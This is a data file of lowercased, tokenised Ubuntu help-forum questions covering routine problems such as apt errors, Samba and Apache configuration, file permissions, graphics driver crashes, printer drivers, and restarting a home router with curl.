273049	how to get back to the terminal while busy	i am running an install from the terminal but i need to get access to a file in the same directory . what gets me back is bg or bz ? i know it is something like that .
273050	why can i only launch scripts via terminal ?	if i want to execute a script ( i already marked it as executable ) , a text editor opens the script . if i want to choose an app from the list , the system suggests me editors , browsers , etc ( not even a terminal ) . if i am looking for apps online ( via nautilus ) , all i get are text editors as well . so the only way is that i open scripts via terminal . but why ca n't i just double click on them and hit `` run '' in the window which pops up ? thanks for your help ! i found a solution : open nautilus - > preferences - > behaviour - > run executable text files when they are opened .
273055	ethtool on ubuntu and an usb to ethernet adapter	i 'm using ubuntu 12.04 , recently i purchased an usb to ethernet adapter . the dmesg command shows the model as `` davicom dm9601 usb ethernet '' . i 'm unable to use ethtool to modify any of its settings . jesin @ localhost : ~ $ sudo ethtool eth1 settings for eth1 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full link partner advertised pause frame use : symmetric receive-only link partner advertised auto-negotiation : yes speed : 100mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on current message level : 0x00000007 ( 7 ) drv probe link link detected : yes when i try to change the speed of the adapter to 10mbps i get jesin @ localhost : ~ $ sudo ethtool -s eth1 speed 10 can not advertise speed 10 i can not even change the port type jesin @ localhost : ~ $ sudo ethtool -s eth1 port tp can not set new settings : invalid argument not setting port what is causing this problem ? additional info : jesin @ localhost : ~ $ sudo ethtool -- version ethtool version 3.1 jesin @ localhost : ~ $ uname -r 3.2.0-39-generic
273062	terminator terminal issue are f12 quake mode hide	i was installing a file from the terminal and then hit f12 to minimize the terminal so i could get access to a text file . after i obtained the needed information , i hit f12 but the terminal would n't appear . the top bar said terminator but no matter what i did it would n't visually appear . i ended up having to open another instance of the terminal reboot and not make that mistake again . is there a way to get the terminal to appear in a situation like this ?
273066	running python in vim	i have tried googling but i could n't find anything relevant . is it possible to program in python on vim and do something like : ! ipython to have python execute the code ? last time i tried that , it just opened up python in the terminal .
274073	minecraft wont run	hi this is the error message -- -- minecraft crash report -- -- // oh - i know what i did wrong ! time : 3/27/13 10:53 am description : failed to start game org.lwjgl.lwjglexception : x error - disp : 0x7f87780096b0 serial : 145 error : badalloc ( insufficient resources for operation ) request_code : 154 minor_code : 24 at org.lwjgl.opengl.linuxdisplay.globalerrorhandler ( linuxdisplay.java:268 ) at org.lwjgl.opengl.linuxcontextimplementation.ncreate ( native method ) at org.lwjgl.opengl.linuxcontextimplementation.create ( linuxcontextimplementation.java:51 ) at org.lwjgl.opengl.context. < init > ( context.java:120 ) at org.lwjgl.opengl.display.create ( display.java:858 ) at org.lwjgl.opengl.display.create ( display.java:784 ) at org.lwjgl.opengl.display.create ( display.java:765 ) at net.minecraft.client.minecraft.a ( sourcefile:235 ) at avv.a ( sourcefile:56 ) at net.minecraft.client.minecraft.run ( sourcefile:507 ) at java.lang.thread.run ( thread.java:722 ) a detailed walkthrough of the error , its code path and all known details is as follows : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- system details -- details : minecraft version : 1.5.1 operating system : linux ( amd64 ) version 3.5.0-17-generic java version : 1.7.0_15 , oracle corporation java vm version : openjdk 64-bit server vm ( mixed mode ) , oracle corporation memory : 405695400 bytes ( 386 mb ) / 514523136 bytes ( 490 mb ) up to 954466304 bytes ( 910 mb ) jvm flags : 2 total ; -xmx1024m -xms512m aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used suspicious classes : no suspicious classes found . intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 lwjgl : 2.4.2 opengl : ~~error~~ nullpointerexception : null is modded : probably not . jar signature remains and client brand is untouched . type : client ( map_client.txt ) texture pack : default profiler position : n/a ( disabled ) vec3 pool size : ~~error~~ nullpointerexception : null
274074	ca n't bring bios up now that i have ubuntu installed ( side-by-side with windows vista )	i recently installed ubuntu desktop alongside windows and i like ubuntu so much , i want to reinstall it as the sole operating system on my laptop . the dvd i burned wo n't boot up automatically so i 'm trying to get into bios to make that happen , but i ca n't get the bios screen when i start the computer . instead , the screen that allows me to boot windows or ubuntu appears . tried hitting f8 but it does n't present options for the dvd bootup . can anyone help me with this ? i 'm computer-use literate but not highly technical . thx . : )
274082	dropbox keeps having me log back in	each time i boot up ubuntu , dropbox asks me to log back and then tells me that i have linked to this computer before , which i have . i am running ubuntu 12.10 off of a live usb . dropbox is the only other program that does this ( asking me to log back in and not remembering my credentials ) . help ?
274086	how can i fix those failed ?	w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/multiverse/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/universe/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/multiverse/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-studio 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) /dists/quantal/universe/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
274088	xorg crashing : ubuntu automatic logout , back to login screen	since a few days ago , my ubuntu xorg keeps crashing . at random times , i get automatically logged out and i go back to the login screen . my xorg log output is as follows : /var/log/xorg.1.log.old : [ 161352.959 ] ( ee ) intel ( 0 ) : detected a hung gpu , disabling acceleration . /var/log/xorg.1.log.old : [ 161352.959 ] ( ee ) intel ( 0 ) : when reporting this , please include i915_error_state from debugfs and the full dmesg . on google i could n't find a workaround . anyone got an idea to avoid these crashes - either use another linux distro , another gnome , another gpu driver ... ?
274092	libreoffice writer 4 theme problem	after upgrade to ubuntu 12.10 writer disappeared so i installed it via software center but now my writer look like this : how to revert to default theme so it looks exact like rest of system . i 'm using ambience theme .
274096	awk quoting program text	i just came across a gotcha in awk , and i would like to know if anyone can explain to me why this happens . the following 2 lines behave differently if i run : # grep -rl base_dir -- exclude-dir=.svn * | awk -f `` / '' ' { print $ 1 } ' i get ( as expected ) just the first directory of the path to files containing base_dir . however , if i run it like this : # grep -rl base_dir -- exclude-dir=.svn * | awk -f= '' / '' `` { print $ 1 } '' edit : -f= '' / '' and -f `` / '' do n't make a difference on my tests . the second command has been updated to show this as suggested by glenn jackman on the answer i changed the command to : # grep -rl base_dir -- exclude-dir=.svn * | awk -f `` / '' `` { print $ 1 } '' and got the exact same flawed result end of edit i get the full path to files containing base_dir , i tried escaping the program text so it would be `` { print \ $ 1 } '' in case this was the issue , but i got the same results . can anybody enlighten me as to what the problem is here ?
274100	unable to install eclipse , how can i locate the missing package ?	i ca n't install eclipse with sudo apt-get install eclipse-platform the response is : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package eclipse-platform
274101	ubuntu server specs for a multi purpose server	i am not sure if this is the right place to ask but anyway ! if you 're willing to purchase a dell server ( let 's say the dell poweredge t420 since it 's an ubuntu certified server ) and want to use it as a multi-functional server : - java enterprise web application ( as a saas ) - about 20.000 connected users . - postgresql database - local storage and network - company website of course , the os is ubuntu 12.04 server . what specs would you settle on for that physical server ? is it a good idea to act so ? are we obliged to go for something like the t420 . should we aim for something lower ? higher in specs ? thanks t420 : http : //www.dell.com/downloads/global/products/pedge/t420_spec_sheet.pdf
274103	need help troubleshooting apache inside vm	i 'm hitting a wall troubleshooting this . i feel the problem is either due to my lack of networking skills , or a basic knowledge of configuring apache . i 'm hoping i can shed some light on my setup by describing my workflow . i have a remote ubuntu server 12.04 vm which i access via ssh as such : ssh username @ 111.111.111.111 port 1234 . i 've got apache2 running and i 've confirmed so because netstat -tulpn shows that apache2 is listening on 0.0.0.0:80 . and indeed apache2 is running as a process if i run ps . additionally , running wget localhost downloads the apache 's `` it works ! '' html file . problem is when i go to my local computer , and open up http : //111.111.111.111:1234 , i get the following errors : firefox : ssh-2.0-openssh_5.9p1 debian-5ubuntu1 chrome : this webpage is not available ... error 101 ( net : :err_connection_reset ) : the connection was reset .
274106	how to set up a new user with admin rights on a usb ubuntu 12.04 installation ?	i have successfully installed 12.04 lts on a usb stick with persistence and it is working well . i have even managed to add flash player and get wifi working . i would like to password protect the usb stick . however , when i try this with administrator privileges and i try to login again it does not recognise the password . the password/user name combination does work for a standard user though ! quite annoying . any ideas on a solution anyone ?
274113	is ubuntu adopting performance for gaming ?	i was just wondering if the future builds of ubuntu would give better performance with games and multi-tasking . many threads suggest that ubuntu gives slower performance with many active applications than windows . i agree that linux platform is yet to rival with windows when it comes to multi-tasking . but still , can the future builds ( hopefully the next one ) of ubuntu give good performance with games and stuff like high end graphics ?
274114	vpn connection does n't work on vmware	i use vmware for my dev work with ubuntu 12.04 . i just installed kde for add my vpn connection , the configuration seems ok . but i ca n't find how to connect my interface eth0 with my vpn . when i try nmcli con up id `` vpn name connection '' i have this error ( process:2604 ) : glib-warning ** : ( /build/buildd/glib2.0-2.32.3/./glib/gerror.c:390 ) : g_error_new_valist : runtime check failed : ( domain ! = 0 ) error : no suitable device found : no active connection or device . i read many thread and no one help with my trouble . anyone have an idea ?
274115	how do i prevent apt-get upgrade from installing unwanted packages	package `` gwibber '' is not installed on my server , and yet when i run apt-get upgrade i see the following : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter libgwibber-gtk2 libgwibber2 libneon27-gnutls libruby1.8 rsyslog when i run apt-get remove gwibber i see : reading package lists ... done building dependency tree reading state information ... done package gwibber is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . how do i run get apt-get to not install things i do n't want or need on upgrade requests ? update the issue was that the services/libraries for gwibber were not removed removing gwibber* and libgwibber addressed the issue .
274116	how to repair videos ?	videos ' size became 0byte . i do n't know what happened . but some of the videos work , those recently played became 0byte . on totem says : stream contains no data . and on other player they do n't play they are loaded but stuck . i think i 'm virus-ed ?
274117	why are the .zip files of compressed .jpegs about the same size ?	i am a new user of linux os 's and i am trying ubuntu 12.10 right in this days . the overall impression is quite positive , but there are some features that make it still complicated for use from most would-be users and in certain specific situations . so , today i had to compress a couple of important .jpeg images into .zip files , to send them through thunderbird to a windows-using bureau ( at least as i guess ) , and the outcome of the compression ( simple way : right click- > compress- > .zip and same folder without password ) were files of the very same size ! : - ( i tried removing the .jpeg extension , i tried with formats other than .zip ( although not sure they would be successfully opened from the recipient ) , i downloaded the `` 7zip '' utility , i spent a while over all of this trying random things ... not a different outcome than same-size files . so , should i not be willing to use the command lines , how can i quickly compress these files or folders into .zip ( not interested in other extensions at the moment ) in case the simple procedure above does not work ? sorry that you may find it a banal question , but i think these are the little hassles that prevent unix-like os 's from becoming really widespread . thank you for your help !
274124	ubuntu 12.04 gets stuck sometimes	sometimes my laptop get stuck while working with firefox as well as some other applications . my laptop is a lenovo g560 with : cpu : intel i5 4core a 1.5gb graphic card 8 gb ram my os is ubuntu 12.04 lts 64bit
274127	posting html req to restart router via terminal on curl fails	i read from this page how to restart the router using curl . i got the command for my router http : //192.168.1.1/forms/tools_system_1 ? restoreflag=0 & restart=restart it works when i put it in browser 's address bar but when i use curl curl -u admin : mypass 'http : //192.168.1.1/forms/tools_system_1 ? restoreflag=0 & restart=restart' it does not work . no output is there in terminal screen . edit result of -- curl -i -u admin : mypass 'http : //192.168.1.1/forms/tools_system_1 ? restoreflag=0 & restart=restart' gives this -- http/1.1 401 unauthorized www-authenticate : basic realm= '' 450tc1 '' content-type : text/html transfer-encoding : chunked server : rompager/4.07 upnp/1.0 ext : < html > < head > < title > protected object < /title > < /head > < body > < h1 > protected object < /h1 > this object on the rompager server is protected output of curl -- verbose -u admin : mypass 'http : //192.168.1.1/forms/tools_system_1 ? restoreflag=0 & restart=restart' gives this -- * about to connect ( ) to 192.168.1.1 port 80 ( # 0 ) * trying 192.168.1.1 ... connected * server auth using basic with user 'admin' > get /forms/tools_system_1 ? restoreflag=0 & restart=restart http/1.1 > authorization : basic ywrtaw46c2hhcmluz2fumda3 > user-agent : curl/7.22.0 ( x86_64-pc-linux-gnu ) libcurl/7.22.0 openssl/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3 > host : 192.168.1.1 > accept : */* > < http/1.1 303 see other < location : http : //192.168.1.1/progress.htm < content-length : 0 < server : rompager/4.07 upnp/1.0 < ext : < * connection # 0 to host 192.168.1.1 left intact * closing connection # 0 but curl -u admin : mypass 192.168.1.1 returns this . works fine ! < html > < head > < title > < /title > < meta http-equiv= '' content-type '' content= '' text/html ; charset= iso-8859-1 '' > < meta http-equiv=content-script-type content=text/javascript > < meta http-equiv=content-style-type content=text/css > < /head > < frameset rows= '' 65,75 , * '' framespacing= '' 0 '' border= '' 0 '' frameborder= '' 0 '' > < frame name= '' header '' noresize src= '' status.html '' marginwidth= '' 0 '' marginheight= '' 0 '' > < frame name= '' navigation '' noresize src= '' navigation-status.html '' marginwidth= '' 0 '' marginheight= '' 0 '' > < frame name= '' main '' noresize src= '' ../status/status_deviceinfo.htm '' marginwidth= '' 0 '' marginheight= '' 0 '' > < /frameset > < noframes > < /noframes > < /html >
274129	installing daily build	now i 'm downloading 13.04 daily build iso . i have archlinux but i want to switch to something more stable and ubuntu is the best linux os imo ( not just a group of packages but rly good os ) . well my question is : what version will the packages be updated to if i run system update ? will it behave as a rolling release distro or will it stop getting new , other than security updates when 13.04 final is released ?
274131	peculiar permissions/group trouble	i 've tried creating a separate user account for rtorrent and sickbeard ( a torrent downloader ) so everything is n't running as root but i 've bitten off more than i can chew . i 've chmodded 2770 ( setgid , user+group all ) and am sure 'sickbeard ' is in the 'users ' group , as is rtorrent . sickbeard is still complaining that it ca n't write . i 've even tried 'su sickbeard ' , navigated to the directory , and touching to create a file and it works perfectly . i am sure sickbeard is running as the user sickbeard , i 've checked in htop . here is some output that might be of use : sickbeard @ parsnip : /media/store1/torrents $ groups sickbeard users rtorrent @ parsnip : /media/store1/torrents $ groups rtorrent users root @ parsnip : /media/store1/torrents # ls -lha total 268k drwxrws -- - 7 rtorrent users 4.0k mar 27 16:46 . drwxrws -- - 11 root users 4.0k mar 27 17:03 .. drwxrws -- - 4 rtorrent users 4.0k mar 27 16:26 complete drwxrws -- - 4 rtorrent users 4.0k mar 27 16:46 download drwxrws -- - 2 rtorrent users 244k mar 27 16:42 session drwxrws -- - 2 rtorrent users 4.0k mar 27 13:56 uploads drwxrws -- - 4 rtorrent users 4.0k mar 27 16:25 watch rtorrent @ parsnip : /media/store1/torrents/watch/tv $ ls -lha total 12k drwxrws -- - 3 rtorrent users 4.0k mar 27 16:25 . drwxrws -- - 4 rtorrent users 4.0k mar 27 16:25 .. drwxrws -- - 2 rtorrent users 4.0k mar 27 17:09 sickbeard hopefully a unix pro can point out where i 'm going wrong . edit : there is definitely something strange going on . the conflicting info below has me puzzled - i have n't changed a thing since the above . parsnip @ parsnip : ~ $ sudo grep -e '^users : ' /etc/gshadow users : * : :xbmc , sickbeard , rtorrent , parsnip , root parsnip @ parsnip : ~ $ sudo grep -e '^users : ' /etc/group users : x:100 : xbmc , sickbeard , rtorrent , parsnip , root parsnip @ parsnip : ~ $ groups parsnip adm cdrom sudo dip plugdev lpadmin sambashare parsnip @ parsnip : ~ $ cd /media/store1/torrents/complete/tv/sickbeard -bash : cd : /media/store1/torrents/complete/tv/sickbeard : permission denied parsnip @ parsnip : ~ $ su sickbeard sickbeard @ parsnip : /home/parsnip $ groups sickbeard users sickbeard @ parsnip : /home/parsnip $ cd /media/store1/torrents/complete/tv/sickbeard sickbeard @ parsnip : /media/store1/torrents/complete/tv/sickbeard $ exit exit parsnip @ parsnip : ~ $ cd /media/store1/torrents/complete/tv/sickbeard -bash : cd : /media/store1/torrents/complete/tv/sickbeard : permission denied
274133	ubuntu 10.04 - vm - wireless card ( wlan0 )	is there anyway to configure properly wifi card to my ubuntu in vma ? im choosing bridged connection to my wifi adapter but connection is only available when got checked box ( cable connection ) . after typing ifconfig i can see im connected to my router and it generates ip from dhcp . but its eth0 instead of wlan0 . after un-checking box with cable connection in vm its not working also eth0 is still visible without connection . regards ,
274136	where is the window switcher in ubuntu 12.10 ?	i just installed the new ubuntu 12.10 . i also installed the compiz settings manager because i like to customize the desktop a little bit . i really like the window switcher that used to come with compiz . with this setting , you can customize a key-combination ( i like to use the super + tab ) and you can cycle through all the open windows that you have . it is a cool 3d visualization and very useful . i think it was called `` ring switcher '' in my 12.04 installation . does anyone know how i can get this functionality back ? thanks !
274138	samba only works if logged in over ssh	i have a headless ubuntu server running samba . i have a windows 7 laptop , windows 8 desktop , a lubuntu desktop running xbmc , and a samsung note2 running android . whenever any of these computers has a terminal window open running ssh to the server ( mothership ) samba works perfectly for everything on the network . as soon as i logout or close the terminal window , nothing can access the shared files . here is the samba config on mothership : [ global ] ; general server settings netbios name = mothership server string = mothership workgroup = workgroup announce version = 5.0 socket options = tcp_nodelay iptos_lowdelay so_keepalive so_rcvbuf=8192 so_sndbuf=8192 passdb backend = tdbsam security = user null passwords = true username map = /etc/samba/smbusers name resolve order = lmhosts wins bcast host hosts wins support = no printing = cups printcap name = cups syslog = 1 syslog only = yes [ myfiles ] path = /home/ < my_name > /media browseable = yes read only = no guest ok = yes create mask = 0644 directory mask = 0755 /home and everything in it is set to 755 . does anyone know how i can get samba to work properly ?
274140	3rd party software on crossover works well but not in wine	my ubuntu version : 12.04 . i have downloaded a software to work on wine . so , i configured wine by installing dotnet20 and mdac28 etc . at last i could run the program . it needs an active internet connection . but , the problem was - some of the items in the window were not there . instead of them , it showed some overlapped letters . then , i heard about crossover . so i installed it . i could run the same software successfully without any border problem or overlapping letters . but , crossover shows that it has only 15 days remaining . i am not interested in buying crossover full version . instead , can i configure wine perfectly for working the software ? or are there any free crossover versions ? software dnwld link : https : //gcc.geojit.net/itt/flip_platinum.zip
274141	how to install nethack-qt in ubuntu 12.10 ?	looks like this package should be available , but sudo apt-get update & & sudo apt-get install nethack-qt just reports that package nethack-qt is not available , but is referred to by another package . what gives ? ubuntu software center reports that no items match `` nethack-qt '' in software sources i 've enabled everything in the ubuntu software tab and `` canonical partners '' in the other software tab . do i need to enable some other source to get it ? i 'm running ubuntu 12.10 64 bit .
274143	adding a question to keyboard authentication method in ssh server	i read this article about authentication methods for ssh this is what is written there ? during keyboard authentication zero or more prompts ( questions ) is presented to the user . the user should give the answer to each prompt ( question ) . the number and contents of the questions are virtually not limited , so certain types of automated logins are also possible . i run ssh server on ubuntu . my question is how can i add more prompts ( questions ) ? now it prompts just for the password . thank you
274146	boot gateway dx4860-ur308 to usb live	i have a new dx4860-ur308 bios version p11-a0 . the secure boot is disabled and the 1st boot device is set to removable device and the 2nd is set to cd . i have a live usb and live cd in each , respectively , but still machine boots to windows . any suggestions ? thanks !
274148	software center issues	it says items can not be installed or removed until the package catalog is repaired . do you want to repair it now ? i 'm new to ubuntu and have gone through various answers on this forum and so far , nothing i have tried has worked . any suggestions ? thanks in advance .
274149	trying to install 13.04 or 12.04 or 12.10 on macbook pro 2010 with 17 '' display	i had no problems with the installation , following the instructions on the wiki . afterwards i got a huge problem though . i am currently seeking advice how to proceed . i get the background color of ubuntu plus some glitches in the place where the menu should be . it 's just the screen after the first launch after reboot . it 's just a basic install , i have n't touched on configurations yet . i ca n't do anything with the os as it is no terminal no nothing . how can i fix this ?
274152	bash comparison and expression operators	i 'm new to bash programming . i 've read two good , long guides , but they made a mess in my head about operators and keywords . which are more commonly and widely used ? i do n't know when to use which and why . test , [ [ ] ] or [ ] or even ( ( ) ) $ ( ( exp ) ) or $ [ exp ] -gt or > , ge or > = etc . when to use < and > or ( ) and when we have to escape it with \ : \ < \ ( etc . == or = ( string comparisons ) i know the basic differences between [ and [ [ but other questions are a mystery for me . thank you in advance
274153	command line for hiding and unhiding unity panel	i use ubuntu 12.10 on a touchscreen with a digitizer pen to take notes and while i 'm doing this i would rather to have all my desktop for this purpose . on the other hand while doing other stuff i would switch a lot between apps . so i want to make a shortcut on my keyboard to toggle the status of unity panel . i 've tried the commands suggested here : shortcut to change launcher 'hide ' setting gconftool-2 -- type int -- set `` /apps/compiz-1/plugins/unityshell/screen0/options/launcher_hide_mode '' 2 but it seems like the commands do not work . i installed the gconf-editor and changed the value of the variable manually , but that also does n't help . the commands change the value in the gconf-editor though , but the panel is still not hidden . is there something that i am missing ? i also changed the variable type to string and boolean , but still no success . ps : i could n't leave a comment there , so i had to ask it in a new question . edit : same result for the command dconf write /org/gnome/gnome-panel/layout/toplevels/bottom-panel/auto-hide true from how do i hide the panels in fallback mode using the command line ?
274165	brightness is getting change after the reboot/shutdown	i have tried changing the brightness . added echo 4 > /sys/class/backlight/intel_backlight/brightness to /etc/rc.local but it is temporary change & still getting black screen while login . how can we set the brightness settings permanently ?
274174	`` system program problem detected '' with apport-gpu-error-intel.py	my ubuntu 12.10 was working fine , until a week ago when a software update was installed . now , every two minutes , the computer hangs for a couple of seconds , and then an error message pops up saying `` system program problem detected . '' upon click `` show details '' , it shows that this is a problem with a file named apport-gpu-error-intel.py in /usr/share/apport/ . how can i stop this from happening ?
274181	ubuntu 12.10 graphics card error	since ubuntu 12.10 i have an error with the video card . my graphics card is `` intel hd graphics '' . the screen is distorted and sometimes there appear error messages . because ubuntu does not recognize the graphics card , i installed mesa-utils . now appears that i am using intel ® sandy bridge desktop , but the errors are still on . i have installed ubuntu 12.10 once again and this time i 've made ​​no updates . now there are no more errors . the problem must be due to the updates . because i have to do about 300 updates , it will be difficult to pick out the faulty one . with synaptic i made updates stepwise and have now localized the faulty package . incorrectly could be one of the following packages : commit log for sat mar 30 12:25:05 2013 die folgenden pakete wurden entfernt : ( the following packages were removed : ) libdrm-intel1 : i386 libdrm-nouveau2 : i386 libdrm-radeon1 : i386 libdrm2 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglu1-mesa : i386 playonlinux wine wine1.4 wine1.4-amd64 wine1.4-common wine1.4-i386 : i386 die folgenden pakete wurden aktualisiert : ( the following packages have been updated : ) alsa-base ( 1.0.25+dfsg-0ubuntu3 ) to 1.0.25+dfsg-0ubuntu3.1 app-install-data-partner ( 12.12.10 ) to 12.12.10.1 apport ( 2.6.1-0ubuntu3 ) to 2.6.1-0ubuntu10 apport-gtk ( 2.6.1-0ubuntu3 ) to 2.6.1-0ubuntu10 apt ( 0.9.7.5ubuntu5 ) to 0.9.7.5ubuntu5.4 dmsetup ( 2:1.02.74-4ubuntu1 ) to 2:1.02.74-4ubuntu1.1 libcairo-gobject2 ( 1.12.2-1ubuntu2.2 ) to 1.12.4-0ubuntu0~quantal15.2 libcairo2 ( 1.12.2-1ubuntu2.2 ) to 1.12.4-0ubuntu0~quantal15.2 libdevmapper-event1.02.1 ( 2:1.02.74-4ubuntu1 ) to 2:1.02.74-4ubuntu1.1 libdevmapper1.02.1 ( 2:1.02.74-4ubuntu1 ) to 2:1.02.74-4ubuntu1.1 libdrm-intel1 ( 2.4.39-0ubuntu1 ) to 2.4.40-0ubuntu0~quantal5.2 libdrm-nouveau1a ( 2.4.39-0ubuntu1 ) to 2.4.40-0ubuntu0~quantal5.2 libdrm-nouveau2 ( 2.4.39-0ubuntu1 ) to 2.4.40-0ubuntu0~quantal5.2 libdrm-radeon1 ( 2.4.39-0ubuntu1 ) to 2.4.40-0ubuntu0~quantal5.2 libdrm2 ( 2.4.39-0ubuntu1 ) to 2.4.40-0ubuntu0~quantal5.2 libkms1 ( 2.4.39-0ubuntu1 ) to 2.4.40-0ubuntu0~quantal5.2 libva1 ( 1.0.15-4build1 ) to 1.1.0-0ubuntu0~quantal5.1 linux-image-generic ( 3.5.0.17.19 ) to 3.5.0.26.32 linux-libc-dev ( 3.5.0-17.28 ) to 3.5.0-26.42 ubuntu-drivers-common ( 1:0.2.71 ) to 1:0.2.71.1 xserver-xorg-video-intel ( 2:2.20.9-0ubuntu2 ) to 2:2.20.12-0ubuntu0~quantal5.1 die folgenden pakete wurden installiert : ( the following packages were installed : ) linux-image-3.5.0-26-generic ( 3.5.0-26.42 )
274185	epson tm-t88iv not printing from firefox/chrome -- ubu 12.04	i 'm using a procedure successfully used with debian 6 and ubuntu 10.04 - 11.04 . get drivers from epson pos drivers apt-get install cups libusb-1.0-0 libusb-1.0-0-dev unzip tm\ ba\ series\ thermal\ printer\ driver\ 1100.zip cd epson_tm_thermal_printer_driver_1100/tmt-cups/ sudo bash install.sh sudo chown -r root.root ppd/*.ppd sudo cp ppd/*.ppd /usr/share/ppd/openprinting/epson/ [ or somewhere handy ] finish installation in cups localhost:631 problems/symptoms : the good : prints cups test pages successfully prints from xterm : eg. , lp < < < `` my very brief test page '' if web page is printed to pdf first , then sent to receipt printer ... it works ! the bad : does not print from firefox does not print from chromium the ugly [ error messages ] : from cups : stopped `` /usr/lib/cups/filter/rastertotmt failed '' other noteworthy facts : this printer is a t88iv , epson does not list drivers for the iv , only the v. so i 'm using the drivers for the v -- - this works in windows , by the way , use drivers for v and the iv works just fine . i 've checked permissions for all ppd files and directories and matched them to existing ppd files/directories on the system . printing to a xerox works fine . so , how can i get rid of the rastertotmt error above ?
274192	error during installation using usb	i want to install ubuntu 12.04.1 lts ( beside windows 8 ) on my vaio laptop using usb stick . after booting from the usb , this message is shown : btrfs loaded xor : automatically using best checksumming function : piii_sse i like to try ubuntu . please help me .
274195	startup problem ubuntu 12.10 dell xps l502x	i have tried installing ubuntu 12.10 in my pc , dell xps l502x with optimus ( intel i7 2630qm , nvidia gt540m ) . during the installation i did n't experience any problem , the resolution it was correct : 1366x768 after rebooting the computer , the x server had an error and ask me to make a correction . the options does appear , but i can not do anything , there is no mouse pointer , tab and send does n't do anything . with ctrl+f1 i change to a terminal , in the next link you 'll find the contents of the xorg.log file . i do n't understand the problem , with linux mint 14 does n't have any error of this kind . thanks in advance . sorry if i did a bad translation , learning italian . : ) original question is here : problema di avvio ubunu 12.10 dell xps l502x ciao , ho provato a installare ubuntu 12.10 sul mio pc , dell xps l502x con optumus ( intel i7 2630qm , nvidia gt 540m ) . durante l'installazione non ho avuto nessun problema , la risoluzione era corretta 1366x768 . una volta riavviato il portatile il server x ă¨ andato in errore e mi viene chiesto di effetturare una correzzione . compaiono delle opzioni , ma non riesco a fare niente , non c'ă¨ puntatore del mouse , tab e invio non fanno niente http : //img822.imageshack.us/img822/2992/colorina2013032700132.jpg con ctrl+f1 sono passato a un terminale , al seguente link trovate il contenuto del file xorg.log : http : //pastebin.com/bpjk9jkm non capisco il problema , con linux mint 14 non ho nessun errore di questo genere . vi ringrazio in anticipo .
274198	skype launcher icon not working	i had to do a fresh install of my oss , and after downloading all the updates and going up to 12.10 ( the disk i had was 12.04 ) , i installed skype , and it works fine ... from the terminal , that is . i can run it fine from there , but the icon launcher does not work . it flashes a little like it 's loading , but then nothing happens . i do n't know what else to say , it 's simple inconvenience nuance , but i would n't mind fixing it . /usr/share/app-install/desktop/skype.desktop : [ desktop entry ] x-appinstall-package=skype x-appinstall-proprietary=true x-appinstall-channel=quantal-partner x-appinstall-licenseuri=/usr/share/app-install/channels/quantal-partner.eula name=skype comment=skype internet telephony exec=skype-wrapper icon=skype.png terminal=0 type=application encoding=utf-8 categories=network ; application ; /usr/share/applications/skype.desktop : [ desktop entry ] name=skype comment=skype internet telephony exec=skype % u icon=skype.png terminal=false type=application encoding=utf-8 categories=network ; application ; mimetype=x-scheme-handler/skype ; x-kde-protocols=skype
